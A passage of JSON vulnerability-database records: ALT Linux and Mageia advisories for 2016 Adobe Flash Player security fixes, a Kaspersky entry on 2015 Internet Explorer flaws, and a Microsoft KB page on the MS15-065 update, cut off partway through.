"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:06:57", "description": "3:11-alt61 built April 8, 2016 Sergey V Turchin in task [#162674](<https://git.altlinux.org/tasks/162674/>) \n--- \nApril 8, 2016 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\n CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\n CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt61", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", 
"CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T00:00:00", "id": "4148DE1054952F52F991A8E3D2615576", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1976109086464300213", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:24", "description": "3:11-alt61 built April 8, 2016 Sergey V Turchin in task [#162675](<https://git.altlinux.org/tasks/162675/>) \n--- \nApril 8, 2016 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\n CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\n CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt61", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T00:00:00", "id": "324457AA60645772187CEA30F961D066", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1976109086464300213", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.616 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update hardens a mitigation against JIT spraying attacks that could be used to bypass memory layout randomization mitigations (CVE-2016-1006). This update resolves type confusion vulnerabilities that could lead to code execution (CVE-2016-1015, CVE-2016-1019). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031). This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033). This update resolves a stack overflow vulnerability that could lead to code execution (CVE-2016-1018). This update resolves a security bypass vulnerability (CVE-2016-1030). 
This update resolves a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-1014). Adobe reports that CVE-2016-1019 is already being actively exploited on Windows systems. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-08T06:17:28", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-08T06:17:28", "id": "MGASA-2016-0134", "href": "https://advisories.mageia.org/MGASA-2016-0134.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:24:06", "description": "### 
*Detect date*:\n07/14/2015\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to read local files, cause a denial of service, bypass security restrictions, execute arbitrary code, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions 8 through 11\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2015-2372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2372>) \n[CVE-2015-2388](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2388>) \n[CVE-2015-2389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2389>) \n[CVE-2015-2408](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2408>) \n[CVE-2015-2425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2425>) \n[CVE-2015-2403](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2403>) \n[CVE-2015-2402](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2402>) \n[CVE-2015-2404](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2404>) \n[CVE-2015-2406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2406>) \n[CVE-2015-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1729>) \n[CVE-2015-2412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2412>) \n[CVE-2015-2384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2384>) \n[CVE-2015-2385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2385>) 
\n[CVE-2015-2422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2422>) \n[CVE-2015-2390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2390>) \n[CVE-2015-2391](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2391>) \n[CVE-2015-1738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1738>) \n[CVE-2015-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1733>) \n[CVE-2015-1767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1767>) \n[CVE-2015-2383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2383>) \n[CVE-2015-2410](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2410>) \n[CVE-2015-2413](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2413>) \n[CVE-2015-2414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2414>) \n[CVE-2015-2411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2411>) \n[CVE-2015-2397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2397>) \n[CVE-2015-2398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2398>) \n[CVE-2015-2419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2419>) \n[CVE-2015-2421](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2421>) \n[CVE-2015-2401](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2401>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2015-2372](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2372>) 9.3 Critical \n[CVE-2015-2388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2388>) 9.3 Critical 
\n[CVE-2015-2389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2389>) 9.3 Critical \n[CVE-2015-2408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2408>) 9.3 Critical \n[CVE-2015-2425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2425>) 9.3 Critical \n[CVE-2015-2403](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2403>) 9.3 Critical \n[CVE-2015-2402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2402>) 4.3 Warning \n[CVE-2015-2404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2404>) 9.3 Critical \n[CVE-2015-2406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2406>) 9.3 Critical \n[CVE-2015-1729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1729>) 4.3 Warning \n[CVE-2015-2412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2412>) 4.3 Warning \n[CVE-2015-2384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2384>) 9.3 Critical \n[CVE-2015-2385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2385>) 9.3 Critical \n[CVE-2015-2422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2422>) 9.3 Critical \n[CVE-2015-2390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2390>) 9.3 Critical \n[CVE-2015-2391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2391>) 9.3 Critical \n[CVE-2015-1738](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1738>) 9.3 Critical \n[CVE-2015-1733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1733>) 9.3 Critical \n[CVE-2015-1767](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1767>) 9.3 Critical \n[CVE-2015-2383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2383>) 9.3 Critical \n[CVE-2015-2410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2410>) 4.3 Warning \n[CVE-2015-2413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2413>) 4.3 Warning \n[CVE-2015-2414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2414>) 4.3 Warning 
\n[CVE-2015-2411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2411>) 9.3 Critical \n[CVE-2015-2397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2397>) 9.3 Critical \n[CVE-2015-2398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2398>) 4.3 Warning \n[CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>) 9.3 Critical \n[CVE-2015-2421](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2421>) 4.3 Warning \n[CVE-2015-2401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401>) 9.3 Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3065822](<http://support.microsoft.com/kb/3065822>) \n[3072604](<http://support.microsoft.com/kb/3072604>) \n[3076321](<http://support.microsoft.com/kb/3076321>)\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "kaspersky", "title": "KLA10634 Multiple vulnerabilities in Microsoft Internet Explorer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1729", "CVE-2015-1733", "CVE-2015-1738", "CVE-2015-1767", "CVE-2015-2372", "CVE-2015-2383", "CVE-2015-2384", "CVE-2015-2385", "CVE-2015-2388", "CVE-2015-2389", "CVE-2015-2390", "CVE-2015-2391", "CVE-2015-2397", "CVE-2015-2398", "CVE-2015-2401", "CVE-2015-2402", "CVE-2015-2403", "CVE-2015-2404", "CVE-2015-2406", "CVE-2015-2408", "CVE-2015-2410", "CVE-2015-2411", 
"CVE-2015-2412", "CVE-2015-2413", "CVE-2015-2414", "CVE-2015-2419", "CVE-2015-2421", "CVE-2015-2422", "CVE-2015-2425"], "modified": "2020-06-18T00:00:00", "id": "KLA10634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10634/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:53", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><span></span>This security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about the vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/ms15-065\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS15-065</a>.<br/><br/></div><h2>How to obtain and install the update</h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">Method 1: Microsoft Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a>. <br/><br/><span class=\"text-base\">Note</span> For Windows RT and Windows RT 8.1, this update is available only through Microsoft Update.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Download Center</h3>You can obtain the stand-alone update package through the Microsoft Download Center. 
Go to <a href=\"https://technet.microsoft.com/library/security/ms15-065\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin MS15-065</a> to find the download links for this update.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Additional information about this security update</h3>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><ul class=\"sbody-free_list\"><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3065822\" id=\"kb-link-5\">3065822 </a> MS15-065: Description of the security update for Internet Explorer: July 14, 2015 </div></span></li><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3074886\" id=\"kb-link-6\">3074886 </a> OneNote app cannot open notebooks, and an ActiveX control cannot be installed in Internet Explorer </div></span></li><li><span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3075516\" id=\"kb-link-7\">3075516 </a> MS15-065: Description of the security update for JScript9.dll in Internet Explorer: July 14, 2015 </div></span></li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\">Windows Server 2003 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information 
for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3065822-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE7-WindowsServer2003-KB3065822-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">IE8-WindowsServer2003-KB3065822-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 
x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">IE8-WindowsServer2003-KB3065822-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/262841\" id=\"kb-link-8\" target=\"_self\">Microsoft Knowledge Base Article 262841</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>KB3065822.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>KB3065822-IE7.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/>KB3065822-IE8.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. 
Or, use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB3065822$\\Spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. Or, use the Spuninst.exe utility that is located in the %Windir%\\ie7updates\\KB3065822-IE7\\spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. Or, use the Spuninst.exe utility that is located in the %Windir%\\ie8updates\\KB3065822-IE8\\spuninst folder</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822 \" id=\"kb-link-9\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Internet Explorer 6 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB3065822\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 for all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP0\\KB3065822-IE7\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td 
class=\"sbody-td\">For Internet Explorer 8 for all supported 32-bit editions and x64-based editions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP0\\KB3065822-IE8\\Filelist</strong></td></tr></table></div><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x64.msu</span></td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-10\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-11\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Server 2008:<br/><span 
